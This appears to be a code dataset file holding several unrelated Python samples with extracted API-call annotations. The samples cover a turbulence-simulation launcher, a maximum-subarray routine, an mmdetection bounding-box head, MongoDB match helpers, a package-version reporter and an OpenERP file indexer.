parser.set_defaults(launchDaint=False)
parser.add_argument('--launchEuler', dest='launchEuler',
action='store_true', help="Only print run options.")
parser.set_defaults(launchEuler=False)
parser.add_argument('--LES', dest='LES', action='store_true',
help="Triggers LES modeling.")
parser.set_defaults(LES=False)
parser.add_argument('--case', type = int, default = -1,
help="Simulation case.")
args = parser.parse_args()
if args.LES: rangeles = np.linspace(0.16, 0.24, 9)
else: rangeles = [None]
NUS, EPS, RUN, CSS = [], [], [], []
h = 2 * np.pi / 16 / 12
for nu in np.logspace(np.log10(0.002), np.log10(0.02), 16) :
for eps in np.logspace(np.log10(0.01), np.log10(2.0), 16) :
if relFit(nu, eps) > 100 or relFit(nu, eps) < 20: continue
if lambdaFit(nu, eps) > 0.1 * 2 * np.pi: continue
if etaFit(nu, eps) > h or etaFit(nu, eps) < h/8: continue
for les in rangeles :
for i in [0, 1, 2] :
NUS,EPS,RUN,CSS = NUS+[nu], EPS+[eps], RUN+[i], CSS+[les]
nCases = len(NUS)
#print('Defined %d cases' % nCases)
if args.launchDaint: launchDaint(nCases, args.LES)
if args.case < 0: cases = range(nCases)
else: cases = [args.case]
for i in cases:
if args.printOptions:
print( getSettings(NUS[i], EPS[i], CSS[i]) )
if args.printName:
print( runspec(NUS[i], EPS[i], RUN[i], CSS[i]) )
if args.launchEuler:
launchEuler(NUS[i], EPS[i], RUN[i])
#for nu in [0.002, 0.004, 0.008] :
# for eps in [0.02, 0.04, 0.08, 0.16, 0.32] :
# tke0 = 2.77578963 * np.power(eps, (2.0/3.0) )
# for scal in [2, 3] :
# tke0 = 2.77578963 * np.power(eps, (2.0/3.0) )
# for scal in [2] :
# ext = scal * np.pi
# os.system("\
# export NU=%f \n\
# export EPS=%f \n\
# export TKE0=%f \n\
# export EXT=%f \n\
# echo $NU $EPS $TKE0 $EXT \n\
# ./launchEuler.sh settingsHIT_DNS.sh HIT_DNS_EXT%dpi_EPS%.02f_NU%.03f"
# % (nu, eps, tke0, ext, scal, eps, nu))
#for nu in [0.001, 0.002, 0.004, 0.008, 0.016] :
# for eps in [0.02, 0.04, 0.08, 0.16, 0.32, 0.64] :
| [
"argparse.ArgumentParser",
"numpy.power",
"os.system",
"numpy.linspace",
"numpy.log10",
"os.getenv",
"numpy.sqrt"
] | [((762, 779), 'numpy.sqrt', 'np.sqrt', (['(nu / eps)'], {}), '(nu / eps)\n', (769, 779), True, 'import os, numpy as np, argparse\n'), ((1307, 1324), 'numpy.sqrt', 'np.sqrt', (['(nu / eps)'], {}), '(nu / eps)\n', (1314, 1324), True, 'import os, numpy as np, argparse\n'), ((1329, 1496), 'os.system', 'os.system', (['("""export NU=%f \n export EPS=%f \n export TANALYSIS=%f \n echo $NU $EPS \n ./launchEuler.sh settingsHIT_DNS.sh %s """\n % (nu, eps, tAnalysis, runname))'], {}), '(\n """export NU=%f \n export EPS=%f \n export TANALYSIS=%f \n echo $NU $EPS \n ./launchEuler.sh settingsHIT_DNS.sh %s """\n % (nu, eps, tAnalysis, runname))\n', (1338, 1496), False, 'import os, numpy as np, argparse\n'), ((1569, 1589), 'os.getenv', 'os.getenv', (['"""SCRATCH"""'], {}), "('SCRATCH')\n", (1578, 1589), False, 'import os, numpy as np, argparse\n'), ((1601, 1618), 'os.getenv', 'os.getenv', (['"""HOME"""'], {}), "('HOME')\n", (1610, 1618), False, 'import os, numpy as np, argparse\n'), ((2900, 2930), 'os.system', 'os.system', (['"""sbatch HIT_sbatch"""'], {}), "('sbatch HIT_sbatch')\n", (2909, 2930), False, 'import os, numpy as np, argparse\n'), ((2972, 3065), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Compute a target file for RL agent from DNS data."""'}), "(description=\n 'Compute a target file for RL agent from DNS data.')\n", (2995, 3065), False, 'import os, numpy as np, argparse\n'), ((124, 135), 'numpy.sqrt', 'np.sqrt', (['nu'], {}), '(nu)\n', (131, 135), True, 'import os, numpy as np, argparse\n'), ((168, 188), 'numpy.power', 'np.power', (['eps', '(-0.25)'], {}), '(eps, -0.25)\n', (176, 188), True, 'import os, numpy as np, argparse\n'), ((191, 209), 'numpy.power', 'np.power', (['nu', '(0.75)'], {}), '(nu, 0.75)\n', (199, 209), True, 'import os, numpy as np, argparse\n'), ((278, 289), 'numpy.sqrt', 'np.sqrt', (['nu'], {}), '(nu)\n', (285, 289), True, 'import os, numpy as np, argparse\n'), ((4009, 4035), 'numpy.linspace', 'np.linspace', (['(0.16)', '(0.24)', '(9)'], {}), '(0.16, 0.24, 9)\n', (4020, 4035), True, 'import os, numpy as np, argparse\n'), ((4159, 4174), 'numpy.log10', 'np.log10', (['(0.002)'], {}), '(0.002)\n', (4167, 4174), True, 'import os, numpy as np, argparse\n'), ((4176, 4190), 'numpy.log10', 'np.log10', (['(0.02)'], {}), '(0.02)\n', (4184, 4190), True, 'import os, numpy as np, argparse\n'), ((101, 123), 'numpy.power', 'np.power', (['eps', '(1 / 6.0)'], {}), '(eps, 1 / 6.0)\n', (109, 123), True, 'import os, numpy as np, argparse\n'), ((255, 278), 'numpy.power', 'np.power', (['eps', '(-1 / 6.0)'], {}), '(eps, -1 / 6.0)\n', (263, 278), True, 'import os, numpy as np, argparse\n'), ((4227, 4241), 'numpy.log10', 'np.log10', (['(0.01)'], {}), '(0.01)\n', (4235, 4241), True, 'import os, numpy as np, argparse\n'), ((4243, 4256), 'numpy.log10', 'np.log10', (['(2.0)'], {}), '(2.0)\n', (4251, 4256), True, 'import os, numpy as np, argparse\n')] |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import defaultdict
import numpy as np
def find_smallest_positive(alist):
# find first positive value
minpos = -1
for x in alist:
if x > 0:
minpos = x
break
if minpos > 0:
# find smallest positive value
for x in alist:
if x > 0 and x < minpos:
minpos = x
return minpos
def rebase_to_smallest_positive(alist):
base = find_smallest_positive(alist)
if base == -1:
return None
else:
return [x - base for x in alist]
def compute_maximum_subarray(score_vector=None):
begin_temp = begin = end = 0
start_val = score_vector[0]
max_ending_here = max_so_far = start_val
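    # Kadane's algorithm: one left-to-right scan that restarts the running sum whenever it
    # goes negative and records the (begin, end) indices of the best sum seen so far.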
for pos, x in enumerate(score_vector[1:], 1):
if max_ending_here < 0:
max_ending_here = x
begin_temp = pos
else:
max_ending_here = max_ending_here + x
if max_ending_here > max_so_far:
max_so_far = max_ending_here
begin = begin_temp
end = pos
return begin, end
def compute_iterated_maximum_subarray(seq=None, score=None, min_subarray_size=None, max_subarray_size=None, output='minimal', margin=1):
original_score = score
while True:
# find (begin,end) of subarray in each element
begin, end = compute_maximum_subarray(score_vector=score)
# check that the retrieved subarray is larger than min_subarray_size
if end - begin < min_subarray_size - 1:
break
else:
# extract maximum subarray
# NOTE: in order to account for border effects we expand on the left and on the right by 'margin'
first = max(0, begin - margin)
# NOTE: we return + 1 for the rightmost postition to be compliant with the 'one after the end' semantics
last = min(len(seq), end + margin + 1)
subarray = seq[first: last]
subarray_size = len(subarray)
if max_subarray_size == -1 or subarray_size <= max_subarray_size:
# store data
acc = 0
for x in original_score[begin: end + 1]:
acc += x
if output == 'minimal':
subarray = {'subarray_string': ''.join(subarray)}
else:
subarray = {'subarray_string': ''.join(subarray), 'subarray': subarray, 'begin': first,
'end': last, 'size': subarray_size, 'seq': seq, 'score': acc}
yield subarray
if subarray_size > max_subarray_size:
# if the subarray is too large then rebase the score list, i.e. offset by the smallest positive value
score = rebase_to_smallest_positive(score)
if score is None:
break
else:
# remove current subarray by zeroing importance values of subarray
score[first: last] = [0.0] * subarray_size
# iterate after removal of current subarray
def extract_sequence_and_score(graph=None):
# make dict with positions as keys and lists of ids as values
pos_to_ids = defaultdict(list)
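    # Group vertex ids by their 'position' attribute so labels and importance scores that
    # share a position can be merged into a single sequence element.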
for u in graph.nodes():
if 'position' not in graph.node[u]: # no position attributes in graph, use the vertex id instead
raise Exception('Missing "position" attribute in node:%s %s' % (u, graph.node[u]))
else:
pos = graph.node[u]['position']
# accumulate all node ids
pos_to_ids[pos] += [u]
# extract sequence of labels and importances
seq = [None] * len(pos_to_ids)
score = [0] * len(pos_to_ids)
for pos in sorted(pos_to_ids):
ids = pos_to_ids[pos]
labels = [graph.node[u].get('label', 'N/A') for u in ids]
# check that all labels for the same position are identical
assert(sum([1 for label in labels if label == labels[0]]) == len(labels)
), 'ERROR: non identical labels referring to same position: %s %s' % (pos, labels)
seq[pos] = labels[0]
# average all importance score for the same position
importances = [graph.node[u].get('importance', 0) for u in ids]
score[pos] = np.mean(importances)
return seq, score
def compute_max_subarrays_sequence(seq=None, score=None, min_subarray_size=None, max_subarray_size=None, output='minimal', margin=1):
# extract subarrays
for subarray in compute_iterated_maximum_subarray(seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, output=output, margin=margin):
yield subarray
def compute_max_subarrays(graph=None, min_subarray_size=None, max_subarray_size=None, output='minimal', margin=1):
seq, score = extract_sequence_and_score(graph)
for subarray in compute_max_subarrays_sequence(seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, output=output, margin=margin):
yield subarray
| [
"collections.defaultdict",
"numpy.mean"
] | [((3311, 3328), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (3322, 3328), False, 'from collections import defaultdict\n'), ((4362, 4382), 'numpy.mean', 'np.mean', (['importances'], {}), '(importances)\n', (4369, 4382), True, 'import numpy as np\n')] |
import torch.nn as nn
from ..registry import HEADS
from ..utils import ConvModule
from .bbox_head import BBoxHead
import torch
import torch.nn.functional as F
import mmcv
from mmdet.core import mask_target, mask_bg_target, force_fp32, bbox_target, bbox_overlaps
from ..losses import accuracy
from ..builder import build_loss
@HEADS.register_module
class ConvFCBBoxHead_MH(BBoxHead):
"""More general bbox head, with shared conv and fc layers and two optional
separated branches.
/-> cls convs -> cls fcs -> cls
shared convs -> shared fcs
\-> reg convs -> reg fcs -> reg
""" # noqa: W605
def __init__(self,
num_shared_convs=0,
num_shared_fcs=0,
num_cls_convs=0,
num_cls_fcs=0,
num_reg_convs=0,
num_reg_fcs=0,
mask_channels=256,
using_mask = True,
with_IoU = False,
conv_out_channels=256,
fc_out_channels=1024,
proto_combine='con',
feature_reduce=False,
# mask_conv=3,
conv_cfg=None,
norm_cfg=None,
using_bg=False,
using_refine=True,
loss_iou = dict(type='MSELoss', loss_weight=0.5),
*args,
**kwargs):
super(ConvFCBBoxHead_MH, self).__init__(*args, **kwargs)
assert (num_shared_convs + num_shared_fcs + num_cls_convs +
num_cls_fcs + num_reg_convs + num_reg_fcs > 0)
if num_cls_convs > 0 or num_reg_convs > 0:
assert num_shared_fcs == 0
if not self.with_cls:
assert num_cls_convs == 0 and num_cls_fcs == 0
if not self.with_reg:
assert num_reg_convs == 0 and num_reg_fcs == 0
self.num_shared_convs = num_shared_convs
self.using_mask = using_mask
self.num_shared_fcs = num_shared_fcs
self.num_cls_convs = num_cls_convs
self.num_cls_fcs = num_cls_fcs
self.num_reg_convs = num_reg_convs
self.num_reg_fcs = num_reg_fcs
self.conv_out_channels = conv_out_channels
self.fc_out_channels = fc_out_channels
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
self.using_bg = using_bg
self.using_refine = using_refine
self.with_IoU = with_IoU
self.mask_channels = mask_channels
self.proto_combine = proto_combine
self.feature_reduce = feature_reduce
if with_IoU:
self.iou_loss = build_loss(loss_iou)
# self.hint_conv = ConvModule(self.mask_channels, self.mask_channels, 1, conv_cfg=conv_cfg, norm_cfg=norm_cfg)
# add shared convs and fcs
if self.proto_combine == 'None':
if self.feature_reduce:
self.reduce_con = ConvModule(self.in_channels, conv_out_channels - mask_channels, 1, conv_cfg=conv_cfg,
norm_cfg=norm_cfg)
else:
combine_channels = self.in_channels + self.mask_channels if proto_combine == 'con' else self.in_channels
self.combine = ConvModule(combine_channels, conv_out_channels, 1, conv_cfg=conv_cfg, norm_cfg=norm_cfg)
# self.mask_conv = nn.ModuleList()
# for i in range(mask_conv):
# conv_m = ConvModule(1, 1, 3, padding=1, conv_cfg=conv_cfg, norm_cfg=norm_cfg)
# self.mask_conv.append(conv_m)
self.shared_convs, self.shared_fcs, last_layer_dim = \
self._add_conv_fc_branch(
self.num_shared_convs, self.num_shared_fcs, self.in_channels,
True)
self.shared_out_channels = last_layer_dim
# add cls specific branch
self.cls_convs, self.cls_fcs, self.cls_last_dim = \
self._add_conv_fc_branch(
self.num_cls_convs, self.num_cls_fcs, self.shared_out_channels)
# add reg specific branch
self.reg_convs, self.reg_fcs, self.reg_last_dim = \
self._add_conv_fc_branch(
self.num_reg_convs, self.num_reg_fcs, self.shared_out_channels)
if self.num_shared_fcs == 0 and not self.with_avg_pool:
if self.num_cls_fcs == 0:
self.cls_last_dim *= self.roi_feat_area
if self.num_reg_fcs == 0:
self.reg_last_dim *= self.roi_feat_area
self.relu = nn.ReLU(inplace=True)
# reconstruct fc_cls and fc_reg since input channels are changed
if self.with_cls:
self.fc_cls = nn.Linear(self.cls_last_dim, self.num_classes)
if self.with_reg:
out_dim_reg = (4 if self.reg_class_agnostic else 4 *
self.num_classes)
self.fc_reg = nn.Linear(self.reg_last_dim, out_dim_reg)
if self.with_IoU:
self.IoU_reg = nn.Linear(self.reg_last_dim, self.num_classes)
def _add_conv_fc_branch(self,
num_branch_convs,
num_branch_fcs,
in_channels,
is_shared=False):
"""Add shared or separable branch
convs -> avg pool (optional) -> fcs
"""
last_layer_dim = in_channels
# add branch specific conv layers
branch_convs = nn.ModuleList()
if num_branch_convs > 0:
for i in range(num_branch_convs):
conv_in_channels = (
last_layer_dim if i == 0 else self.conv_out_channels)
branch_convs.append(
ConvModule(
conv_in_channels,
self.conv_out_channels,
3,
padding=1,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg))
last_layer_dim = self.conv_out_channels
# add branch specific fc layers
branch_fcs = nn.ModuleList()
if num_branch_fcs > 0:
# for shared branch, only consider self.with_avg_pool
# for separated branches, also consider self.num_shared_fcs
if (is_shared
or self.num_shared_fcs == 0) and not self.with_avg_pool:
last_layer_dim *= self.roi_feat_area
for i in range(num_branch_fcs):
fc_in_channels = (
last_layer_dim if i == 0 else self.fc_out_channels)
branch_fcs.append(
nn.Linear(fc_in_channels, self.fc_out_channels))
last_layer_dim = self.fc_out_channels
return branch_convs, branch_fcs, last_layer_dim
def init_weights(self):
super(ConvFCBBoxHead_MH, self).init_weights()
for module_list in [self.shared_fcs, self.cls_fcs, self.reg_fcs]:
for m in module_list.modules():
if isinstance(m, nn.Linear):
nn.init.xavier_uniform_(m.weight)
nn.init.constant_(m.bias, 0)
# @force_fp32(apply_to=('cls_score', 'bbox_pred'))
# def loss(self,
# cls_score,
# bbox_pred,
# labels,
# label_weights,
# bbox_targets,
# bbox_weights,
# reduction_override=None):
# losses = dict()
# if cls_score is not None:
# avg_factor = max(torch.sum(label_weights > 0).float().item(), 1.)
# losses['loss_cls_refine'] = self.loss_cls(
# cls_score,
# labels,
# label_weights,
# avg_factor=avg_factor,
# reduction_override=reduction_override)
# losses['acc_refine'] = accuracy(cls_score, labels)
# if bbox_pred is not None:
# pos_inds = labels > 0
# if self.reg_class_agnostic:
# pos_bbox_pred = bbox_pred.view(bbox_pred.size(0), 4)[pos_inds]
# else:
# pos_bbox_pred = bbox_pred.view(bbox_pred.size(0), -1,
# 4)[pos_inds, labels[pos_inds]]
# losses['loss_bbox_refine'] = self.loss_bbox(
# pos_bbox_pred,
# bbox_targets[pos_inds],
# bbox_weights[pos_inds],
# avg_factor=bbox_targets.size(0),
# reduction_override=reduction_override)
# return losses
    # TODO: add IoU target acquisition and loss calculation
def get_iou_target(self, sampling_reuslt, bbox_pred, bbox_target):
pos_proposals = [res.pos_bboxes for res in sampling_reuslt]
pos_assigned_gt_inds = [
            res.pos_assigned_gt_inds for res in sampling_reuslt
]
# bbox_overlaps()
def get_mask_target(self, sampling_results, gt_masks, rcnn_train_cfg):
# pos_proposals = [res.pos_bboxes for res in sampling_results]
# pos_assigned_gt_inds = [
# res.pos_assigned_gt_inds for res in sampling_results
# ]
# mask_targets = mask_target(pos_proposals, pos_assigned_gt_inds,
# gt_masks, rcnn_train_cfg)
proposals = [res.bboxes for res in sampling_results]
assigned_gt_inds = [
res.inds for res in sampling_results
]
mask_targets = mask_target(proposals, assigned_gt_inds,
gt_masks, rcnn_train_cfg)
mask_bg_targets = mask_bg_target(proposals, gt_masks, rcnn_train_cfg)
return mask_targets, mask_bg_targets
# def get_target(self, sampling_results, gt_bboxes, gt_labels,
# rcnn_train_cfg):
# pos_proposals = [res.pos_bboxes for res in sampling_results]
# neg_proposals = [torch.tensor([]) for res in sampling_results]
# pos_gt_bboxes = [res.pos_gt_bboxes for res in sampling_results]
# pos_gt_labels = [res.pos_gt_labels for res in sampling_results]
# reg_classes = 1 if self.reg_class_agnostic else self.num_classes
# cls_reg_targets = bbox_target(
# pos_proposals,
# neg_proposals,
# pos_gt_bboxes,
# pos_gt_labels,
# rcnn_train_cfg,
# reg_classes,
# target_means=self.target_means,
# target_stds=self.target_stds)
# return cls_reg_targets
def forward(self, x, mask_pred):
# shared part
if self.using_mask:
# for conv in self.mask_conv:
# mask_pred = conv(mask_pred)
# mask_pred = self.hint_conv(mask_pred)
if self.proto_combine == 'con':
x = torch.cat([x, mask_pred], dim=1)
x = self.combine(x)
elif self.proto_combine == 'sum':
x = x + mask_pred
x = self.combine(x)
else:
x = self.reduce_con(x)
x = torch.cat([x, mask_pred], dim=1)
if self.num_shared_convs > 0:
for conv in self.shared_convs:
x = conv(x)
if self.num_shared_fcs > 0:
if self.with_avg_pool:
x = self.avg_pool(x)
x = x.view(x.size(0), -1)
for fc in self.shared_fcs:
x = self.relu(fc(x))
# separate branches
x_cls = x
x_reg = x
for conv in self.cls_convs:
x_cls = conv(x_cls)
if x_cls.dim() > 2:
if self.with_avg_pool:
x_cls = self.avg_pool(x_cls)
x_cls = x_cls.view(x_cls.size(0), -1)
for fc in self.cls_fcs:
x_cls = self.relu(fc(x_cls))
for conv in self.reg_convs:
x_reg = conv(x_reg)
if x_reg.dim() > 2:
if self.with_avg_pool:
x_reg = self.avg_pool(x_reg)
x_reg = x_reg.view(x_reg.size(0), -1)
for fc in self.reg_fcs:
x_reg = self.relu(fc(x_reg))
cls_score = self.fc_cls(x_cls) if self.with_cls else None
bbox_pred = self.fc_reg(x_reg) if self.with_reg else None
if self.with_IoU:
IoU_pred = self.IoU_reg(x_reg)
return cls_score, bbox_pred, IoU_pred
return cls_score, bbox_pred
@HEADS.register_module
class SharedFCBBoxHead_MH(ConvFCBBoxHead_MH):
def __init__(self, num_fcs=2, fc_out_channels=1024, *args, **kwargs):
assert num_fcs >= 1
super(SharedFCBBoxHead_MH, self).__init__(
num_shared_convs=0,
num_shared_fcs=num_fcs,
num_cls_convs=0,
num_cls_fcs=0,
num_reg_convs=0,
num_reg_fcs=0,
fc_out_channels=fc_out_channels,
*args,
**kwargs)
| [
"torch.nn.ReLU",
"torch.nn.ModuleList",
"torch.nn.init.xavier_uniform_",
"mmdet.core.mask_target",
"torch.cat",
"torch.nn.init.constant_",
"torch.nn.Linear",
"mmdet.core.mask_bg_target"
] | [((4509, 4530), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (4516, 4530), True, 'import torch.nn as nn\n'), ((5421, 5436), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (5434, 5436), True, 'import torch.nn as nn\n'), ((6058, 6073), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (6071, 6073), True, 'import torch.nn as nn\n'), ((9418, 9484), 'mmdet.core.mask_target', 'mask_target', (['proposals', 'assigned_gt_inds', 'gt_masks', 'rcnn_train_cfg'], {}), '(proposals, assigned_gt_inds, gt_masks, rcnn_train_cfg)\n', (9429, 9484), False, 'from mmdet.core import mask_target, mask_bg_target, force_fp32, bbox_target, bbox_overlaps\n'), ((9546, 9597), 'mmdet.core.mask_bg_target', 'mask_bg_target', (['proposals', 'gt_masks', 'rcnn_train_cfg'], {}), '(proposals, gt_masks, rcnn_train_cfg)\n', (9560, 9597), False, 'from mmdet.core import mask_target, mask_bg_target, force_fp32, bbox_target, bbox_overlaps\n'), ((4656, 4702), 'torch.nn.Linear', 'nn.Linear', (['self.cls_last_dim', 'self.num_classes'], {}), '(self.cls_last_dim, self.num_classes)\n', (4665, 4702), True, 'import torch.nn as nn\n'), ((4865, 4906), 'torch.nn.Linear', 'nn.Linear', (['self.reg_last_dim', 'out_dim_reg'], {}), '(self.reg_last_dim, out_dim_reg)\n', (4874, 4906), True, 'import torch.nn as nn\n'), ((4960, 5006), 'torch.nn.Linear', 'nn.Linear', (['self.reg_last_dim', 'self.num_classes'], {}), '(self.reg_last_dim, self.num_classes)\n', (4969, 5006), True, 'import torch.nn as nn\n'), ((10747, 10779), 'torch.cat', 'torch.cat', (['[x, mask_pred]'], {'dim': '(1)'}), '([x, mask_pred], dim=1)\n', (10756, 10779), False, 'import torch\n'), ((6605, 6652), 'torch.nn.Linear', 'nn.Linear', (['fc_in_channels', 'self.fc_out_channels'], {}), '(fc_in_channels, self.fc_out_channels)\n', (6614, 6652), True, 'import torch.nn as nn\n'), ((7026, 7059), 'torch.nn.init.xavier_uniform_', 'nn.init.xavier_uniform_', (['m.weight'], {}), '(m.weight)\n', (7049, 7059), True, 'import torch.nn as nn\n'), ((7080, 7108), 'torch.nn.init.constant_', 'nn.init.constant_', (['m.bias', '(0)'], {}), '(m.bias, 0)\n', (7097, 7108), True, 'import torch.nn as nn\n'), ((11009, 11041), 'torch.cat', 'torch.cat', (['[x, mask_pred]'], {'dim': '(1)'}), '([x, mask_pred], dim=1)\n', (11018, 11041), False, 'import torch\n')] |
#!/usr/bin/python3
from services.loggerServices.loggerService import LoggerService
logger = LoggerService().logger
def create_match(self, data):
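    # insert a new match document and return its generated id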
return self.client.FMT["matches"].insert_one(data).inserted_id
def update_match(self, data):
return self.client.FMT["matches"].update_one(data, upsert=True).inserted_id
def find_match(self, data):
return self.client.FMT["matches"].find_one(data)
def parse_match_from_request(request):
return {
"home_team": request.get("home_team"),
"away_team": request.get("away_team"),
"date": request.get("date")
}
def parse_ended_match_from_request(request):
match = parse_match_from_request(request)
match["score"] = request.get("score").replace(' ', '')
return match
def parse_ended_match_to_db(request):
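    # build the match document to store, adding derived result fields (draw, winner, loser)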
parsed_match = {
"home_team": request.get("home_team"),
"away_team": request.get("away_team"),
"date": request.get("date"),
"score": request.get("score")
}
home_team_score = parsed_match["score"].split('-')[0]
away_team_score = parsed_match["score"].split('-')[1]
# parse match result
if home_team_score == away_team_score:
parsed_match['is_draw'] = True
parsed_match['team_won_score'] = home_team_score
else:
parsed_match['is_draw'] = False
        if int(home_team_score) > int(away_team_score):  # compare the scores numerically, not as strings
parsed_match['team_won'] = parsed_match['home_team']
parsed_match['team_won_score'] = home_team_score
parsed_match['team_lost'] = parsed_match['away_team']
parsed_match['team_lose_score'] = away_team_score
else:
parsed_match['team_won'] = parsed_match['away_team']
parsed_match['team_won_score'] = away_team_score
parsed_match['team_lost'] = parsed_match['home_team']
parsed_match['team_lose_score'] = home_team_score
return parsed_match
def parse_match_from_db(request):
return {
"id": str(request.get("_id")),
"home_team": request.get("home_team"),
"away_team": request.get("away_team"),
"date": request.get("date", None),
"score": request.get("score", None),
"is_draw": request.get("is_draw", None),
"team_won": request.get("team_won", None),
"team_lost": request.get("team_lost", None)
}
| [
"services.loggerServices.loggerService.LoggerService"
] | [((93, 108), 'services.loggerServices.loggerService.LoggerService', 'LoggerService', ([], {}), '()\n', (106, 108), False, 'from services.loggerServices.loggerService import LoggerService\n')] |
#!/usr/bin/env python3
import json
import logging
import os
import re
import subprocess # nosec
import sys
from typing import Dict, Optional, Tuple, cast
SRC_VERSION_RE = re.compile(r"^.*\(([^=]*)===?([^=]*)\)$")
VERSION_RE = re.compile(r"^([^=]*)==([^=]*)$")
LOG = logging.getLogger(__name__)
def _get_package_version(comp: str) -> Tuple[Optional[str], Optional[str]]:
"""
Parse plain and editable versions.
See test_genversion.py for examples.
"""
src_matcher = SRC_VERSION_RE.match(comp)
matcher = src_matcher or VERSION_RE.match(comp)
if matcher:
return cast(Tuple[str, str], matcher.groups())
else:
if len(comp) > 0 and not comp[:3] == "-e ":
print("Cannot parse package version: " + comp)
return None, None
def _get_packages_version() -> Dict[str, str]:
result = {}
with open(os.devnull, "w", encoding="utf-8") as devnull:
for comp in (
subprocess.check_output(["python3", "-m", "pip", "freeze"], stderr=devnull) # nosec
.decode()
.strip()
.split("\n")
):
name, version = _get_package_version(comp)
if name is not None and version is not None:
result[name] = version
return result
def deprecated() -> None:
"""Run the command and print a deprecated notice."""
LOG.warning("c2cwsgiutils_genversion.py is deprecated; use c2cwsgiutils-genversion instead")
return main()
def main() -> None:
"""Run the command."""
if len(sys.argv) == 2:
git_tag = None
git_hash = sys.argv[1]
else:
git_tag = sys.argv[1]
git_hash = sys.argv[2]
report = {"main": {"git_hash": git_hash}, "packages": _get_packages_version()}
if git_tag is not None:
report["main"]["git_tag"] = git_tag
with open("versions.json", "w", encoding="utf-8") as file:
json.dump(report, file, indent=2)
if __name__ == "__main__":
main()
| [
"json.dump",
"subprocess.check_output",
"logging.getLogger",
"re.compile"
] | [((173, 215), 're.compile', 're.compile', (['"""^.*\\\\(([^=]*)===?([^=]*)\\\\)$"""'], {}), "('^.*\\\\(([^=]*)===?([^=]*)\\\\)$')\n", (183, 215), False, 'import re\n'), ((228, 260), 're.compile', 're.compile', (['"""^([^=]*)==([^=]*)$"""'], {}), "('^([^=]*)==([^=]*)$')\n", (238, 260), False, 'import re\n'), ((268, 295), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (285, 295), False, 'import logging\n'), ((1906, 1939), 'json.dump', 'json.dump', (['report', 'file'], {'indent': '(2)'}), '(report, file, indent=2)\n', (1915, 1939), False, 'import json\n'), ((946, 1021), 'subprocess.check_output', 'subprocess.check_output', (["['python3', '-m', 'pip', 'freeze']"], {'stderr': 'devnull'}), "(['python3', '-m', 'pip', 'freeze'], stderr=devnull)\n", (969, 1021), False, 'import subprocess\n')] |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
import os
import tempfile
from subprocess import Popen, PIPE
_logger = logging.getLogger(__name__)
class NhException(Exception):
pass
class indexer(object):
""" An indexer knows how to parse the content of some file.
Typically, one indexer should be instantiated per file
type.
Override this class to add more functionality. Note that
you should only override the Content or the File methods
that give an optimal result. """
def _getMimeTypes(self):
""" Return supported mimetypes """
return []
def _getExtensions(self):
return []
def _getDefMime(self, ext):
""" Return a mimetype for this document type, ideally the
closest to the extension ext. """
mts = self._getMimeTypes();
if len (mts):
return mts[0]
return None
def indexContent(self, content, filename=None, realfile=None):
""" Use either content or the real file, to index.
Some parsers will work better with the actual
content, others parse a file easier. Try the
optimal.
"""
res = ''
try:
if content != None:
return self._doIndexContent(content)
except NhException:
pass
if realfile != None:
try:
return self._doIndexFile(realfile)
except NhException:
pass
fp = open(realfile,'rb')
try:
content2 = fp.read()
finally:
fp.close()
# The not-handled exception may be raised here
return self._doIndexContent(content2)
# last try, with a tmp file
if content:
try:
fname,ext = filename and os.path.splitext(filename) or ('','')
fd, rfname = tempfile.mkstemp(suffix=ext)
os.write(fd, content)
os.close(fd)
res = self._doIndexFile(rfname)
os.unlink(rfname)
return res
except NhException:
pass
raise NhException('No appropriate method to index file.')
def _doIndexContent(self, content):
raise NhException("Content cannot be handled here.")
def _doIndexFile(self, fpath):
raise NhException("Content cannot be handled here.")
def __repr__(self):
return "<indexer %s.%s>" %(self.__module__, self.__class__.__name__)
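# Illustrative sketch only -- not part of the original module. It shows the override
# points described in the indexer docstring above; the class name and the
# mimetype/extension values are hypothetical examples.
class _plainTextIndexer(indexer):
    def _getMimeTypes(self):
        return ['text/plain']
    def _getExtensions(self):
        return ['.txt']
    def _doIndexContent(self, content):
        # plain text needs no parsing, so the content is already the index text
        return content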
def mime_match(mime, mdict):
if mdict.has_key(mime):
return (mime, mdict[mime])
if '/' in mime:
mpat = mime.split('/')[0]+'/*'
if mdict.has_key(mpat):
return (mime, mdict[mpat])
return (None, None)
class contentIndex(object):
def __init__(self):
self.mimes = {}
self.exts = {}
def register(self, obj):
f = False
for mime in obj._getMimeTypes():
self.mimes[mime] = obj
f = True
for ext in obj._getExtensions():
self.exts[ext] = obj
f = True
if f:
_logger.debug('Register content indexer: %r.', obj)
if not f:
raise Exception("Your indexer should at least support a mimetype or extension.")
def doIndex(self, content, filename=None, content_type=None, realfname=None, debug=False):
fobj = None
fname = None
mime = None
if content_type and self.mimes.has_key(content_type):
mime = content_type
fobj = self.mimes[content_type]
elif filename:
bname,ext = os.path.splitext(filename)
if self.exts.has_key(ext):
fobj = self.exts[ext]
mime = fobj._getDefMime(ext)
if content_type and not fobj:
mime,fobj = mime_match(content_type, self.mimes)
if not fobj:
try:
if realfname :
fname = realfname
else:
try:
bname,ext = os.path.splitext(filename or 'test.tmp')
except Exception:
bname, ext = filename, 'tmp'
fd, fname = tempfile.mkstemp(suffix=ext)
os.write(fd, content)
os.close(fd)
